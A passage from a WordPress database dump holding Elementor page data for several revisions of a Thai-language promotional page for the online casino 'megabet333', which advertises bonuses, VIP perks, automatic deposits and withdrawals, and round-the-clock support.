\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(942,125,'_thumbnail_id','60'),(943,125,'_elementor_edit_mode','builder'),(944,125,'_elementor_template_type','wp-page'),(945,125,'_elementor_version','3.32.5'),(946,125,'_elementor_pro_version','3.32.3'),(947,125,'_wp_page_template','default'),(948,125,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(949,125,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(952,126,'_thumbnail_id','60'),(953,126,'_elementor_edit_mode','builder'),(954,126,'_elementor_template_type','wp-page'),(955,126,'_elementor_version','3.32.5'),(956,126,'_elementor_pro_version','3.32.3'),(957,126,'_wp_page_template','default'),(958,126,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(959,126,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(962,127,'_thumbnail_id','60'),(963,127,'_elementor_edit_mode','builder'),(964,127,'_elementor_template_type','wp-page'),(965,127,'_elementor_version','3.32.5'),(966,127,'_elementor_pro_version','3.32.3'),(967,127,'_wp_page_template','default'),(968,127,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(969,127,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP 